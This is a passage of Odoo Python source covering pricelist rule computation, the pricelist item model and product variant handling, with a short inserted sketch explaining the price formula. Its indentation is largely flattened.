'WHERE (item.product_tmpl_id IS NULL OR item.product_tmpl_id = any(%s))'
'AND (item.product_id IS NULL OR item.product_id = any(%s))'
'AND (item.categ_id IS NULL OR item.categ_id = any(%s)) '
'AND (item.pricelist_id = %s) '
'AND (item.date_start IS NULL OR item.date_start<=%s) '
'AND (item.date_end IS NULL OR item.date_end>=%s)'
'ORDER BY item.applied_on, item.min_quantity desc, categ.complete_name desc, item.id desc',
(prod_tmpl_ids, prod_ids, categ_ids, self.id, date, date))
# NOTE: if you change `order by` on that query, make sure it matches
        # _order from model to avoid inconsistencies and nondeterministic issues.
item_ids = [x[0] for x in self._cr.fetchall()]
items = self.env['product.pricelist.item'].browse(item_ids)
results = {}
for product, qty, partner in products_qty_partner:
results[product.id] = 0.0
suitable_rule = False
# Final unit price is computed according to `qty` in the `qty_uom_id` UoM.
# An intermediary unit price may be computed according to a different UoM, in
# which case the price_uom_id contains that UoM.
# The final price will be converted to match `qty_uom_id`.
qty_uom_id = self._context.get('uom') or product.uom_id.id
price_uom_id = product.uom_id.id
qty_in_product_uom = qty
if qty_uom_id != product.uom_id.id:
try:
qty_in_product_uom = self.env['uom.uom'].browse([self._context['uom']])._compute_quantity(qty, product.uom_id)
except UserError:
# Ignored - incompatible UoM in context, use default product UoM
pass
            # if a public user tries to access the standard price from website sale, we need to call price_compute.
# TDE SURPRISE: product can actually be a template
price = product.price_compute('list_price')[product.id]
price_uom = self.env['uom.uom'].browse([qty_uom_id])
for rule in items:
if rule.min_quantity and qty_in_product_uom < rule.min_quantity:
continue
if is_product_template:
if rule.product_tmpl_id and product.id != rule.product_tmpl_id.id:
continue
if rule.product_id and not (product.product_variant_count == 1 and product.product_variant_id.id == rule.product_id.id):
# product rule acceptable on template if has only one variant
continue
else:
if rule.product_tmpl_id and product.product_tmpl_id.id != rule.product_tmpl_id.id:
continue
if rule.product_id and product.id != rule.product_id.id:
continue
if rule.categ_id:
cat = product.categ_id
while cat:
if cat.id == rule.categ_id.id:
break
cat = cat.parent_id
if not cat:
continue
if rule.base == 'pricelist' and rule.base_pricelist_id:
price_tmp = rule.base_pricelist_id._compute_price_rule([(product, qty, partner)])[product.id][0] # TDE: 0 = price, 1 = rule
price = rule.base_pricelist_id.currency_id._convert(price_tmp, self.currency_id, self.env.user.company_id, date, round=False)
else:
# if base option is public price take sale price else cost price of product
# price_compute returns the price in the context UoM, i.e. qty_uom_id
price = product.price_compute(rule.base)[product.id]
convert_to_price_uom = (lambda price: product.uom_id._compute_price(price, price_uom))
if price is not False:
if rule.compute_price == 'fixed':
price = convert_to_price_uom(rule.fixed_price)
elif rule.compute_price == 'percentage':
price = (price - (price * (rule.percent_price / 100))) or 0.0
else:
# complete formula
price_limit = price
price = (price - (price * (rule.price_discount / 100))) or 0.0
if rule.price_round:
price = tools.float_round(price, precision_rounding=rule.price_round)
if rule.price_surcharge:
price_surcharge = convert_to_price_uom(rule.price_surcharge)
price += price_surcharge
if rule.price_min_margin:
price_min_margin = convert_to_price_uom(rule.price_min_margin)
price = max(price, price_limit + price_min_margin)
if rule.price_max_margin:
price_max_margin = convert_to_price_uom(rule.price_max_margin)
price = min(price, price_limit + price_max_margin)
suitable_rule = rule
break
# Final price conversion into pricelist currency
if suitable_rule and suitable_rule.compute_price != 'fixed' and suitable_rule.base != 'pricelist':
if suitable_rule.base == 'standard_price':
cur = product.cost_currency_id
else:
cur = product.currency_id
price = cur._convert(price, self.currency_id, self.env.user.company_id, date, round=False)
results[product.id] = (price, suitable_rule and suitable_rule.id or False)
return results
# New methods: product based
def get_products_price(self, products, quantities, partners, date=False, uom_id=False):
""" For a given pricelist, return price for products
Returns: dict{product_id: product price}, in the given pricelist """
self.ensure_one()
return {
product_id: res_tuple[0]
for product_id, res_tuple in self._compute_price_rule(
list(pycompat.izip(products, quantities, partners)),
date=date,
uom_id=uom_id
).items()
}
def get_product_price(self, product, quantity, partner, date=False, uom_id=False):
""" For a given pricelist, return price for a given product """
self.ensure_one()
return self._compute_price_rule([(product, quantity, partner)], date=date, uom_id=uom_id)[product.id][0]
def get_product_price_rule(self, product, quantity, partner, date=False, uom_id=False):
""" For a given pricelist, return price and rule for a given product """
self.ensure_one()
return self._compute_price_rule([(product, quantity, partner)], date=date, uom_id=uom_id)[product.id]
# Compatibility to remove after v10 - DEPRECATED
@api.model
def _price_rule_get_multi(self, pricelist, products_by_qty_by_partner):
""" Low level method computing the result tuple for a given pricelist and multi products - return tuple """
return pricelist._compute_price_rule(products_by_qty_by_partner)
@api.multi
def price_get(self, prod_id, qty, partner=None):
""" Multi pricelist, mono product - returns price per pricelist """
return {key: price[0] for key, price in self.price_rule_get(prod_id, qty, partner=partner).items()}
@api.multi
def price_rule_get_multi(self, products_by_qty_by_partner):
""" Multi pricelist, multi product - return tuple """
return self._compute_price_rule_multi(products_by_qty_by_partner)
@api.multi
def price_rule_get(self, prod_id, qty, partner=None):
""" Multi pricelist, mono product - return tuple """
product = self.env['product.product'].browse([prod_id])
return self._compute_price_rule_multi([(product, qty, partner)])[prod_id]
@api.model
def _price_get_multi(self, pricelist, products_by_qty_by_partner):
""" Mono pricelist, multi product - return price per product """
        return pricelist.get_products_price(
            *pycompat.izip(*products_by_qty_by_partner))
# DEPRECATED (Not used anymore, see d39d583b2) -> Remove me in master (saas12.3)
def _get_partner_pricelist(self, partner_id, company_id=None):
""" Retrieve the applicable pricelist for a given partner in a given company.
:param company_id: if passed, used for looking up properties,
instead of current user's company
"""
res = self._get_partner_pricelist_multi([partner_id], company_id)
return res[partner_id].id
def _get_partner_pricelist_multi_search_domain_hook(self):
return []
def _get_partner_pricelist_multi_filter_hook(self):
return self
def _get_partner_pricelist_multi(self, partner_ids, company_id=None):
""" Retrieve the applicable pricelist for given partners in a given company.
It will return the first found pricelist in this order:
First, the pricelist of the specific property (res_id set), this one
is created when saving a pricelist on the partner form view.
Else, it will return the pricelist of the partner country group
Else, it will return the generic property (res_id not set), this one
is created on the company creation.
Else, it will return the first available pricelist
:param company_id: if passed, used for looking up properties,
instead of current user's company
:return: a dict {partner_id: pricelist}
"""
        # `partner_ids` might contain IDs of inactive users. We should use active_test
# as we will do a search() later (real case for website public user).
Partner = self.env['res.partner'].with_context(active_test=False)
Property = self.env['ir.property'].with_context(force_company=company_id or self.env.user.company_id.id)
Pricelist = self.env['product.pricelist']
pl_domain = self._get_partner_pricelist_multi_search_domain_hook()
# if no specific property, try to find a fitting pricelist
result = Property.get_multi('property_product_pricelist', Partner._name, partner_ids)
remaining_partner_ids = [pid for pid, val in result.items() if not val or
not val._get_partner_pricelist_multi_filter_hook()]
if remaining_partner_ids:
# get fallback pricelist when no pricelist for a given country
pl_fallback = (
Pricelist.search(pl_domain + [('country_group_ids', '=', False)], limit=1) or
Property.get('property_product_pricelist', 'res.partner') or
Pricelist.search(pl_domain, limit=1)
)
# group partners by country, and find a pricelist for each country
domain = [('id', 'in', remaining_partner_ids)]
groups = Partner.read_group(domain, ['country_id'], ['country_id'])
for group in groups:
country_id = group['country_id'] and group['country_id'][0]
pl = Pricelist.search(pl_domain + [('country_group_ids.country_ids', '=', country_id)], limit=1)
pl = pl or pl_fallback
for pid in Partner.search(group['__domain']).ids:
result[pid] = pl
return result
@api.model
def get_import_templates(self):
return [{
'label': _('Import Template for Pricelists'),
'template': '/product/static/xls/product_pricelist.xls'
}]
class ResCountryGroup(models.Model):
_inherit = 'res.country.group'
pricelist_ids = fields.Many2many('product.pricelist', 'res_country_group_pricelist_rel',
'res_country_group_id', 'pricelist_id', string='Pricelists')
class PricelistItem(models.Model):
_name = "product.pricelist.item"
_description = "Pricelist Item"
_order = "applied_on, min_quantity desc, categ_id desc, id desc"
# NOTE: if you change _order on this model, make sure it matches the SQL
# query built in _compute_price_rule() above in this file to avoid
    # inconsistencies and nondeterministic issues.
product_tmpl_id = fields.Many2one(
'product.template', 'Product Template', ondelete='cascade',
help="Specify a template if this rule only applies to one product template. Keep empty otherwise.")
product_id = fields.Many2one(
'product.product', 'Product', ondelete='cascade',
help="Specify a product if this rule only applies to one product. Keep empty otherwise.")
categ_id = fields.Many2one(
'product.category', 'Product Category', ondelete='cascade',
help="Specify a product category if this rule only applies to products belonging to this category or its children categories. Keep empty otherwise.")
min_quantity = fields.Integer(
'Min. Quantity', default=0,
help="For the rule to apply, bought/sold quantity must be greater "
"than or equal to the minimum quantity specified in this field.\n"
"Expressed in the default unit of measure of the product.")
applied_on = fields.Selection([
('3_global', 'Global'),
('2_product_category', ' Product Category'),
('1_product', 'Product'),
('0_product_variant', 'Product Variant')], "Apply On",
default='3_global', required=True,
help='Pricelist Item applicable on selected option')
base = fields.Selection([
('list_price', 'Public Price'),
('standard_price', 'Cost'),
('pricelist', 'Other Pricelist')], "Based on",
default='list_price', required=True,
help='Base price for computation.\n'
'Public Price: The base price will be the Sale/public Price.\n'
'Cost Price : The base price will be the cost price.\n'
'Other Pricelist : Computation of the base price based on another Pricelist.')
base_pricelist_id = fields.Many2one('product.pricelist', 'Other Pricelist')
pricelist_id = fields.Many2one('product.pricelist', 'Pricelist', index=True, ondelete='cascade')
price_surcharge = fields.Float(
'Price Surcharge', digits=dp.get_precision('Product Price'),
        help='Specify the fixed amount to add or subtract (if negative) to the amount calculated with the discount.')
price_discount = fields.Float('Price Discount', default=0, digits=(16, 2))
price_round = fields.Float(
'Price Rounding', digits=dp.get_precision('Product Price'),
help="Sets the price so that it is a multiple of this value.\n"
"Rounding is applied after the discount and before the surcharge.\n"
"To have prices that end in 9.99, set rounding 10, surcharge -0.01")
price_min_margin = fields.Float(
'Min. Price Margin', digits=dp.get_precision('Product Price'),
help='Specify the minimum amount of margin over the base price.')
price_max_margin = fields.Float(
'Max. Price Margin', digits=dp.get_precision('Product Price'),
help='Specify the maximum amount of margin over the base price.')
company_id = fields.Many2one(
'res.company', 'Company',
readonly=True, related='pricelist_id.company_id', store=True)
currency_id = fields.Many2one(
'res.currency', 'Currency',
readonly=True, related='pricelist_id.currency_id', store=True)
date_start = fields.Date('Start Date', help="Starting date for the pricelist item validation")
    date_end = fields.Date('End Date', help="Ending date for the pricelist item validation")
compute_price = fields.Selection([
('fixed', 'Fix Price'),
('percentage', 'Percentage (discount)'),
('formula', 'Formula')], index=True, default='fixed')
fixed_price = fields.Float('Fixed Price', digits=dp.get_precision('Product Price'))
percent_price = fields.Float('Percentage Price')
# functional fields used for usability purposes
name = fields.Char(
'Name', compute='_get_pricelist_item_name_price',
help="Explicit rule name for this pricelist line.")
price = fields.Char(
'Price', compute='_get_pricelist_item_name_price',
help="Explicit rule name for this pricelist line.")
@api.constrains('base_pricelist_id', 'pricelist_id', 'base')
def _check_recursion(self):
if any(item.base == 'pricelist' and item.pricelist_id and item.pricelist_id == item.base_pricelist_id for item in self):
raise ValidationError(_('You cannot assign the Main Pricelist as Other Pricelist in PriceList Item'))
return True
@api.constrains('price_min_margin', 'price_max_margin')
def _check_margin(self):
if any(item.price_min_margin > item.price_max_margin for item in self):
raise ValidationError(_('The minimum margin should be lower than the maximum margin.'))
return True
@api.one
@api.depends('categ_id', 'product_tmpl_id', 'product_id', 'compute_price', 'fixed_price', \
'pricelist_id', 'percent_price', 'price_discount', 'price_surcharge')
def _get_pricelist_item_name_price(self):
if self.categ_id:
self.name = _("Category: %s") % (self.categ_id.name)
elif self.product_tmpl_id:
self.name = self.product_tmpl_id.name
elif self.product_id:
self.name = self.product_id.display_name.replace('[%s]' % self.product_id.code, '')
else:
self.name = _("All Products")
if self.compute_price == 'fixed':
self.price = ("%s %s") % (self.fixed_price, self.pricelist_id.currency_id.name)
elif self.compute_price == 'percentage':
self.price = _("%s %% discount") % (self.percent_price)
else:
self.price = _("%s %% discount and %s surcharge") % (self.price_discount, self.price_surcharge)
@api.onchange('applied_on')
def _onchange_applied_on(self):
if self.applied_on != '0_product_variant':
self.product_id = False
if self.applied_on != '1_product':
self.product_tmpl_id = False
if self.applied_on != '2_product_category':
self.categ_id = False
@api.onchange('compute_price')
def _onchange_compute_price(self):
if self.compute_price != 'fixed':
self.fixed_price = 0.0
if self.compute_price != 'percentage':
self.percent_price = 0.0
if self.compute_price != 'formula':
self.update({
'price_discount': 0.0,
'price_surcharge': 0.0,
'price_round': 0.0,
'price_min_margin': 0.0,
'price_max_margin': 0.0,
})
@api.multi
def write(self, values):
res = super(PricelistItem, self).write(values)
# When the pricelist changes we need the product.template price
        # to be invalidated and recomputed.
self.invalidate_cache()
return res
```
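The `formula` branch of `_compute_price_rule` above applies, in order, a percentage discount on the base price, an optional rounding to a multiple of `price_round`, a surcharge, and min/max margin clamps relative to the pre-discount price. A self-contained sketch of that arithmetic, with an illustrative `apply_formula` helper that is not part of the Odoo API and that omits the UoM conversions done on the real records:
```python
# Standalone sketch of the 'formula' computation performed by pricelist item
# rules in Pricelist._compute_price_rule() above. The helper is illustrative;
# Odoo runs the same steps on ORM records and uses tools.float_round (half-up)
# where this sketch uses Python's built-in round().
def apply_formula(base_price, discount=0.0, price_round=0.0, surcharge=0.0, min_margin=0.0, max_margin=0.0):
    price_limit = base_price  # margins are applied relative to this value
    price = base_price - (base_price * (discount / 100.0))
    if price_round:
        # round to the nearest multiple of price_round
        price = round(price / price_round) * price_round
    if surcharge:
        price += surcharge
    if min_margin:
        price = max(price, price_limit + min_margin)
    if max_margin:
        price = min(price, price_limit + max_margin)
    return price
# "To have prices that end in 9.99, set rounding 10, surcharge -0.01"
assert round(apply_formula(103.0, price_round=10, surcharge=-0.01), 2) == 99.99
```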
#### File: product/models/product.py
```python
import logging
import re
from odoo import api, fields, models, tools, _
from odoo.exceptions import ValidationError
from odoo.osv import expression
from odoo.addons import decimal_precision as dp
from odoo.tools import float_compare, pycompat
_logger = logging.getLogger(__name__)
class ProductCategory(models.Model):
_name = "product.category"
_description = "Product Category"
_parent_name = "parent_id"
_parent_store = True
_rec_name = 'complete_name'
_order = 'complete_name'
name = fields.Char('Name', index=True, required=True, translate=True)
complete_name = fields.Char(
'Complete Name', compute='_compute_complete_name',
store=True)
parent_id = fields.Many2one('product.category', 'Parent Category', index=True, ondelete='cascade')
parent_path = fields.Char(index=True)
child_id = fields.One2many('product.category', 'parent_id', 'Child Categories')
product_count = fields.Integer(
'# Products', compute='_compute_product_count',
help="The number of products under this category (Does not consider the children categories)")
@api.depends('name', 'parent_id.complete_name')
def _compute_complete_name(self):
for category in self:
if category.parent_id:
category.complete_name = '%s / %s' % (category.parent_id.complete_name, category.name)
else:
category.complete_name = category.name
def _compute_product_count(self):
read_group_res = self.env['product.template'].read_group([('categ_id', 'child_of', self.ids)], ['categ_id'], ['categ_id'])
group_data = dict((data['categ_id'][0], data['categ_id_count']) for data in read_group_res)
for categ in self:
product_count = 0
for sub_categ_id in categ.search([('id', 'child_of', categ.id)]).ids:
product_count += group_data.get(sub_categ_id, 0)
categ.product_count = product_count
@api.constrains('parent_id')
def _check_category_recursion(self):
if not self._check_recursion():
raise ValidationError(_('You cannot create recursive categories.'))
return True
@api.model
def name_create(self, name):
return self.create({'name': name}).name_get()[0]
class ProductPriceHistory(models.Model):
""" Keep track of the ``product.template`` standard prices as they are changed. """
_name = 'product.price.history'
_rec_name = 'datetime'
_order = 'datetime desc'
_description = 'Product Price List History'
def _get_default_company_id(self):
return self._context.get('force_company', self.env.user.company_id.id)
company_id = fields.Many2one('res.company', string='Company',
default=_get_default_company_id, required=True)
product_id = fields.Many2one('product.product', 'Product', ondelete='cascade', required=True)
datetime = fields.Datetime('Date', default=fields.Datetime.now)
cost = fields.Float('Cost', digits=dp.get_precision('Product Price'))
class ProductProduct(models.Model):
_name = "product.product"
_description = "Product"
_inherits = {'product.template': 'product_tmpl_id'}
_inherit = ['mail.thread', 'mail.activity.mixin']
_order = 'default_code, name, id'
# price: total price, context dependent (partner, pricelist, quantity)
price = fields.Float(
'Price', compute='_compute_product_price',
digits=dp.get_precision('Product Price'), inverse='_set_product_price')
# price_extra: catalog extra value only, sum of variant extra attributes
price_extra = fields.Float(
'Variant Price Extra', compute='_compute_product_price_extra',
digits=dp.get_precision('Product Price'),
help="This is the sum of the extra price of all attributes")
# lst_price: catalog value + extra, context dependent (uom)
lst_price = fields.Float(
'Sale Price', compute='_compute_product_lst_price',
digits=dp.get_precision('Product Price'), inverse='_set_product_lst_price',
help="The sale price is managed from the product template. Click on the 'Configure Variants' button to set the extra attribute prices.")
default_code = fields.Char('Internal Reference', index=True)
code = fields.Char('Reference', compute='_compute_product_code')
partner_ref = fields.Char('Customer Ref', compute='_compute_partner_ref')
active = fields.Boolean(
'Active', default=True,
help="If unchecked, it will allow you to hide the product without removing it.")
product_tmpl_id = fields.Many2one(
'product.template', 'Product Template',
auto_join=True, index=True, ondelete="cascade", required=True)
barcode = fields.Char(
'Barcode', copy=False, oldname='ean13',
help="International Article Number used for product identification.")
attribute_value_ids = fields.Many2many(
'product.attribute.value', string='Attribute Values', ondelete='restrict')
product_template_attribute_value_ids = fields.Many2many(
'product.template.attribute.value', string='Template Attribute Values', compute="_compute_product_template_attribute_value_ids")
# image: all image fields are base64 encoded and PIL-supported
image_variant = fields.Binary(
"Variant Image", attachment=True,
help="This field holds the image used as image for the product variant, limited to 1024x1024px.")
image = fields.Binary(
"Big-sized image", compute='_compute_images', inverse='_set_image',
help="Image of the product variant (Big-sized image of product template if false). It is automatically "
"resized as a 1024x1024px image, with aspect ratio preserved.")
image_small = fields.Binary(
"Small-sized image", compute='_compute_images', inverse='_set_image_small',
help="Image of the product variant (Small-sized image of product template if false).")
image_medium = fields.Binary(
"Medium-sized image", compute='_compute_images', inverse='_set_image_medium',
help="Image of the product variant (Medium-sized image of product template if false).")
is_product_variant = fields.Boolean(compute='_compute_is_product_variant')
standard_price = fields.Float(
'Cost', company_dependent=True,
digits=dp.get_precision('Product Price'),
groups="base.group_user",
help = "Cost used for stock valuation in standard price and as a first price to set in average/fifo. "
"Also used as a base price for pricelists. "
"Expressed in the default unit of measure of the product.")
volume = fields.Float('Volume', help="The volume in m3.")
weight = fields.Float(
'Weight', digits=dp.get_precision('Stock Weight'),
help="Weight of the product, packaging not included. The unit of measure can be changed in the general settings")
pricelist_item_ids = fields.Many2many(
'product.pricelist.item', 'Pricelist Items', compute='_get_pricelist_items')
packaging_ids = fields.One2many(
'product.packaging', 'product_id', 'Product Packages',
help="Gives the different ways to package the same product.")
_sql_constraints = [
('barcode_uniq', 'unique(barcode)', "A barcode can only be assigned to one product !"),
]
def _get_invoice_policy(self):
return False
def _compute_is_product_variant(self):
for product in self:
product.is_product_variant = True
def _compute_product_price(self):
prices = {}
pricelist_id_or_name = self._context.get('pricelist')
if pricelist_id_or_name:
pricelist = None
partner = self.env.context.get('partner', False)
quantity = self.env.context.get('quantity', 1.0)
# Support context pricelists specified as display_name or ID for compatibility
if isinstance(pricelist_id_or_name, pycompat.string_types):
pricelist_name_search = self.env['product.pricelist'].name_search(pricelist_id_or_name, operator='=', limit=1)
if pricelist_name_search:
pricelist = self.env['product.pricelist'].browse([pricelist_name_search[0][0]])
elif isinstance(pricelist_id_or_name, pycompat.integer_types):
pricelist = self.env['product.pricelist'].browse(pricelist_id_or_name)
if pricelist:
quantities = [quantity] * len(self)
partners = [partner] * len(self)
prices = pricelist.get_products_price(self, quantities, partners)
for product in self:
product.price = prices.get(product.id, 0.0)
def _set_product_price(self):
for product in self:
if self._context.get('uom'):
value = self.env['uom.uom'].browse(self._context['uom'])._compute_price(product.price, product.uom_id)
else:
value = product.price
value -= product.price_extra
product.write({'list_price': value})
def _set_product_lst_price(self):
for product in self:
if self._context.get('uom'):
value = self.env['uom.uom'].browse(self._context['uom'])._compute_price(product.lst_price, product.uom_id)
else:
value = product.lst_price
value -= product.price_extra
product.write({'list_price': value})
@api.depends('product_template_attribute_value_ids.price_extra')
def _compute_product_price_extra(self):
for product in self:
product.price_extra = sum(product.mapped('product_template_attribute_value_ids.price_extra'))
@api.depends('list_price', 'price_extra')
def _compute_product_lst_price(self):
to_uom = None
if 'uom' in self._context:
to_uom = self.env['uom.uom'].browse([self._context['uom']])
for product in self:
if to_uom:
list_price = product.uom_id._compute_price(product.list_price, to_uom)
else:
list_price = product.list_price
product.lst_price = list_price + product.price_extra
@api.one
def _compute_product_code(self):
for supplier_info in self.seller_ids:
if supplier_info.name.id == self._context.get('partner_id'):
self.code = supplier_info.product_code or self.default_code
break
else:
self.code = self.default_code
@api.one
def _compute_partner_ref(self):
for supplier_info in self.seller_ids:
if supplier_info.name.id == self._context.get('partner_id'):
product_name = supplier_info.product_name or self.default_code or self.name
self.partner_ref = '%s%s' % (self.code and '[%s] ' % self.code or '', product_name)
break
else:
self.partner_ref = self.name_get()[0][1]
@api.one
@api.depends('image_variant', 'product_tmpl_id.image')
def _compute_images(self):
if self._context.get('bin_size'):
self.image_medium = self.image_variant
self.image_small = self.image_variant
self.image = self.image_variant
else:
resized_images = tools.image_get_resized_images(self.image_variant, return_big=True, avoid_resize_medium=True)
self.image_medium = resized_images['image_medium']
self.image_small = resized_images['image_small']
self.image = resized_images['image']
if not self.image_medium:
self.image_medium = self.product_tmpl_id.image_medium
if not self.image_small:
self.image_small = self.product_tmpl_id.image_small
if not self.image:
self.image = self.product_tmpl_id.image
@api.one
def _set_image(self):
self._set_image_value(self.image)
@api.one
def _set_image_medium(self):
self._set_image_value(self.image_medium)
@api.one
def _set_image_small(self):
self._set_image_value(self.image_small)
@api.one
def _set_image_value(self, value):
if isinstance(value, pycompat.text_type):
value = value.encode('ascii')
image = tools.image_resize_image_big(value)
# This is needed because when there is only one variant, the user
# doesn't know there is a difference between template and variant, he
# expects both images to be the same.
if self.product_tmpl_id.image and self.product_variant_count > 1:
self.image_variant = image
else:
self.image_variant = False
self.product_tmpl_id.image = image
@api.depends('product_tmpl_id', 'attribute_value_ids')
def _compute_product_template_attribute_value_ids(self):
# Fetch and pre-map the values first for performance. It assumes there
# won't be too many values, but there might be a lot of products.
values = self.env['product.template.attribute.value'].search([
('product_tmpl_id', 'in', self.mapped('product_tmpl_id').ids),
('product_attribute_value_id', 'in', self.mapped('attribute_value_ids').ids),
])
values_per_template = {}
for ptav in values:
pt_id = ptav.product_tmpl_id.id
if pt_id not in values_per_template:
values_per_template[pt_id] = {}
values_per_template[pt_id][ptav.product_attribute_value_id.id] = ptav
for product in self:
product.product_template_attribute_value_ids = self.env['product.template.attribute.value']
for pav in product.attribute_value_ids:
if product.product_tmpl_id.id not in values_per_template or pav.id not in values_per_template[product.product_tmpl_id.id]:
_logger.warning("A matching product.template.attribute.value was not found for the product.attribute.value #%s on the template #%s" % (pav.id, product.product_tmpl_id.id))
else:
product.product_template_attribute_value_ids += values_per_template[product.product_tmpl_id.id][pav.id]
@api.one
def _get_pricelist_items(self):
self.pricelist_item_ids = self.env['product.pricelist.item'].search([
'|',
('product_id', '=', self.id),
('product_tmpl_id', '=', self.product_tmpl_id.id)]).ids
@api.constrains('attribute_value_ids')
def _check_attribute_value_ids(self):
for product in self:
attributes = self.env['product.attribute']
for value in product.attribute_value_ids:
if value.attribute_id in attributes:
raise ValidationError(_('Error! It is not allowed to choose more than one value for a given attribute.'))
if value.attribute_id.create_variant == 'always':
attributes |= value.attribute_id
return True
@api.onchange('uom_id', 'uom_po_id')
def _onchange_uom(self):
if self.uom_id and self.uom_po_id and self.uom_id.category_id != self.uom_po_id.category_id:
self.uom_po_id = self.uom_id
@api.model_create_multi
def create(self, vals_list):
products = super(ProductProduct, self.with_context(create_product_product=True)).create(vals_list)
for product, vals in pycompat.izip(products, vals_list):
# When a unique variant is created from tmpl then the standard price is set by _set_standard_price
if not (self.env.context.get('create_from_tmpl') and len(product.product_tmpl_id.product_variant_ids) == 1):
product._set_standard_price(vals.get('standard_price') or 0.0)
# `_get_variant_id_for_combination` depends on existing variants
self.clear_caches()
self.env['product.template'].invalidate_cache(
fnames=[
'valid_archived_variant_ids',
'valid_existing_variant_ids',
'product_variant_ids',
'product_variant_id',
'product_variant_count'
],
ids=products.mapped('product_tmpl_id').ids
)
return products
@api.multi
def write(self, values):
''' Store the standard price change in order to be able to retrieve the cost of a product for a given date'''
res = super(ProductProduct, self).write(values)
if 'standard_price' in values:
self._set_standard_price(values['standard_price'])
if 'attribute_value_ids' in values:
# `_get_variant_id_for_combination` depends on `attribute_value_ids`
self.clear_caches()
if 'active' in values:
# prefetched o2m have to be reloaded (because of active_test)
# (eg. product.template: product_variant_ids)
self.invalidate_cache()
# `_get_first_possible_variant_id` depends on variants active state
self.clear_caches()
return res
@api.multi
def unlink(self):
unlink_products = self.env['product.product']
unlink_templates = self.env['product.template']
for product in self:
# Check if product still exists, in case it has been unlinked by unlinking its template
if not product.exists():
continue
# Check if the product is last product of this template...
other_products = self.search([('product_tmpl_id', '=', product.product_tmpl_id.id), ('id', '!=', product.id)])
# ... and do not delete product template if it's configured to be created "on demand"
if not other_products and not product.product_tmpl_id.has_dynamic_attributes():
unlink_templates |= product.product_tmpl_id
unlink_products |= product
res = super(ProductProduct, unlink_products).unlink()
# delete templates after calling super, as deleting template could lead to deleting
# products due to ondelete='cascade'
unlink_templates.unlink()
# `_get_variant_id_for_combination` depends on existing variants
self.clear_caches()
return res
@api.multi
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
        # TDE FIXME: clean up the context / variant mess
if default is None:
default = {}
if self._context.get('variant'):
# if we copy a variant or create one, we keep the same template
default['product_tmpl_id'] = self.product_tmpl_id.id
elif 'name' not in default:
default['name'] = self.name
return super(ProductProduct, self).copy(default=default)
@api.model
def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):
# TDE FIXME: strange
if self._context.get('search_default_categ_id'):
args.append((('categ_id', 'child_of', self._context['search_default_categ_id'])))
return super(ProductProduct, self)._search(args, offset=offset, limit=limit, order=order, count=count, access_rights_uid=access_rights_uid)
@api.multi
def name_get(self):
# TDE: this could be cleaned a bit I think
def _name_get(d):
name = d.get('name', '')
code = self._context.get('display_default_code', True) and d.get('default_code', False) or False
if code:
name = '[%s] %s' % (code,name)
return (d['id'], name)
partner_id = self._context.get('partner_id')
if partner_id:
partner_ids = [partner_id, self.env['res.partner'].browse(partner_id).commercial_partner_id.id]
else:
partner_ids = []
        # not all users have access to seller and partner records
# check access and use superuser
self.check_access_rights("read")
self.check_access_rule("read")
result = []
# Prefetch the fields used by the `name_get`, so `browse` doesn't fetch other fields
# Use `load=False` to not call `name_get` for the `product_tmpl_id`
self.sudo().read(['name', 'default_code', 'product_tmpl_id', 'attribute_value_ids', 'attribute_line_ids'], load=False)
product_template_ids = self.sudo().mapped('product_tmpl_id').ids
if partner_ids:
supplier_info = self.env['product.supplierinfo'].sudo().search([
('product_tmpl_id', 'in', product_template_ids),
('name', 'in', partner_ids),
])
# Prefetch the fields used by the `name_get`, so `browse` doesn't fetch other fields
# Use `load=False` to not call `name_get` for the `product_tmpl_id` and `product_id`
supplier_info.sudo().read(['product_tmpl_id', 'product_id', 'product_name', 'product_code'], load=False)
supplier_info_by_template = {}
for r in supplier_info:
supplier_info_by_template.setdefault(r.product_tmpl_id, []).append(r)
for product in self.sudo():
# display only the attributes with multiple possible values on the template
variable_attributes = product.attribute_line_ids.filtered(lambda l: len(l.value_ids) > 1).mapped('attribute_id')
variant = product.attribute_value_ids._variant_name(variable_attributes)
name = variant and "%s (%s)" % (product.name, variant) or product.name
sellers = []
if partner_ids:
product_supplier_info = supplier_info_by_template.get(product.product_tmpl_id, [])
sellers = [x for x in product_supplier_info if x.product_id and x.product_id == product]
if not sellers:
sellers = [x for x in product_supplier_info if not x.product_id]
if sellers:
for s in sellers:
seller_variant = s.product_name and (
variant and "%s (%s)" % (s.product_name, variant) or s.product_name
) or False
mydict = {
'id': product.id,
'name': seller_variant or name,
'default_code': s.product_code or product.default_code,
}
temp = _name_get(mydict)
if temp not in result:
result.append(temp)
else:
mydict = {
'id': product.id,
'name': name,
'default_code': product.default_code,
}
result.append(_name_get(mydict))
return result
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
if not args:
args = []
if name:
positive_operators = ['=', 'ilike', '=ilike', 'like', '=like']
product_ids = []
if operator in positive_operators:
product_ids = self._search([('default_code', '=', name)] + args, limit=limit, access_rights_uid=name_get_uid)
if not product_ids:
product_ids = self._search([('barcode', '=', name)] + args, limit=limit, access_rights_uid=name_get_uid)
if not product_ids and operator not in expression.NEGATIVE_TERM_OPERATORS:
# Do not merge the 2 next lines into one single search, SQL search performance would be abysmal
# on a database with thousands of matching products, due to the huge merge+unique needed for the
                # OR operator (and given the fact that the 'name' lookup results come from the ir.translation table).
# Performing a quick memory merge of ids in Python will give much better performance
product_ids = self._search(args + [('default_code', operator, name)], limit=limit)
if not limit or len(product_ids) < limit:
# we may underrun the limit because of dupes in the results, that's fine
limit2 = (limit - len(product_ids)) if limit else False
product2_ids = self._search(args + [('name', operator, name), ('id', 'not in', product_ids)], limit=limit2, access_rights_uid=name_get_uid)
product_ids.extend(product2_ids)
elif not product_ids and operator in expression.NEGATIVE_TERM_OPERATORS:
domain = expression.OR([
['&', ('default_code', operator, name), ('name', operator, name)],
['&', ('default_code', '=', False), ('name', operator, name)],
])
domain = expression.AND([args, domain])
product_ids = self._search(domain, limit=limit, access_rights_uid=name_get_uid)
if not product_ids and operator in positive_operators:
                ptrn = re.compile(r'(\[(.*?)\])')
res = ptrn.search(name)
if res:
product_ids = self._search([('default_code', '=', res.group(2))] + args, limit=limit, access_rights_uid=name_get_uid)
# still no results, partner in context: search on supplier info as last hope to find something
if not product_ids and self._context.get('partner_id'):
suppliers_ids = self.env['product.supplierinfo']._search([
('name', '=', self._context.get('partner_id')),
'|',
('product_code', operator, name),
('product_name', operator, name)], access_rights_uid=name_get_uid)
if suppliers_ids:
